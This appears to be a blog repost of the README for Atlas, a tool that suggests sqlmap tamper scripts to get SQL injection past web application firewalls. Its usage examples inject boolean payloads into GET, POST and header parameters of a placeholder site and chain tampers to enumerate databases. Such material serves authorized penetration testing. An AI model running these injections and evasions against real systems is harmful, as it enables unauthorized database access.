Atlas : Quick SQLMap Tamper Suggester v1.0

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

Screenshot

Installation

$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+

Usage

$ python atlas.py –url http://site.com/index.php?id=Price_ASC –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

injection point (with %%inject%%):

  • Get:

$ python atlas.py –url http://site.com/index/id/%%10%% –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

  • Post:

$ python atlas.py –url http://site.com/index/id/ -m POST -D ‘test=%%10%%’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

  • Headers:

$ python atlas.py –url http://site.com/index/id/ -H ‘User-Agent: mozilla/5.0%%inject%%’ -H ‘X-header: test’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

  • Tampers Concatenation:

$ python atlas.py –url http://site.com/index/id/%%10%% –payload=”-1234 AND 4321=4321– AAAA” –concat “equaltolike,htmlencode” –random-agent -v

  • Get Tampers List:

$ python atlas.py -g

Also Read – Vault : Tool For Secrets Management, Encryption As A Service & Privileged Access Management

Example

  • Run SQLMap:

$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3

Price_ASC’) AND 8716=4837 AND (‘yajr’=’yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

$ python atlas.py –url ‘http://site.com/index.php?id=Price_ASC’ –payload=”‘) AND 8716=4837 AND (‘yajr’=’yajr” –random-agent -v

At this point:

$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3 –tamper=versioned

R K

Recent Posts

How UDP Works and Why It Is So Fast

When people ask how UDP works, the simplest answer is this: UDP sends data quickly…

4 days ago

How EDR Killers Bypass Security Tools

Endpoint Detection and Response (EDR) solutions have become a cornerstone of modern cybersecurity, designed to…

1 week ago

AI-Generated Malware Campaign Scales Threats Through Vibe Coding Techniques

A large-scale malware campaign leveraging AI-assisted development techniques has been uncovered, revealing how attackers are…

1 week ago

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

1 week ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

1 week ago

This Android Bug Can Crack Your Lock Screen in 60 Seconds

A newly disclosed Android vulnerability is making noise for a good reason. Researchers showed that…

2 weeks ago